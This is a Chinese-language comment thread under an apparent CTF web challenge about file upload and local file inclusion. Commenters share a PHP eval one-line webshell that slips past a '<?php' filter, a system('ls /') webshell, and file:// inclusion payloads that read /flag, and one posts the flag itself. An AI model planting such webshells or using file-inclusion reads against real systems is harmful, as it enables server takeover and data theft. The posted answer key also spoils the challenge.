<?php>被过滤了,用这个<script language="php">@eval($_POST['attack'])</script>绕过,然后文件包含即可
文件上传+文件包含
flag{9be4acf19dc430e5ba2973dbb72f371d}
真的无语了 连上马找不到flag 删flag的人马亖了
使用file协议读取文件内容,index.php?file=file:///flag得到flag
@Striker123456 因为原本的协议是file://但是flag这个文件前面需要一个/
为什么是三个斜杠呢
别卷了康康
为啥不能用伪协议????
http://114.67.175.224:14357/index.php?file=/flag
index.php?file=file:///flag 直接一把梭
http://114.67.175.224:15047/index.php?file=/flag,写一句话木马,<script language=php>system("ls /")</script> 查看根目录下的文件,发现flag文件,令file=/flag,即可获得flag
...
评论
不会编程的崽 1年前
举报
<?php>被过滤了,用这个<script language="php">@eval($_POST['attack'])</script>绕过,然后文件包含即可
2728462336 1年前
举报
文件上传+文件包含
wxy1343 1年前
举报
flag{9be4acf19dc430e5ba2973dbb72f371d}
⎝ZJJARY 2年前
举报
真的无语了 连上马找不到flag 删flag的人马亖了
dtm 2年前
举报
使用file协议读取文件内容,index.php?file=file:///flag得到flag
baianquanzu 1年前
举报
@Striker123456 因为原本的协议是file://但是flag这个文件前面需要一个/
Striker123456 2年前
举报
为什么是三个斜杠呢
wecld 2年前
举报
别卷了康康
于无声处听惊雷 2年前
举报
为啥不能用伪协议????
wuzhengke 2年前
举报
http://114.67.175.224:14357/index.php?file=/flag
spiritboy 2年前
举报
index.php?file=file:///flag 直接一把梭
15338641414 2年前
举报
http://114.67.175.224:15047/index.php?file=/flag,写一句话木马,<script language=php>system("ls /")</script> 查看根目录下的文件,发现flag文件,令file=/flag,即可获得flag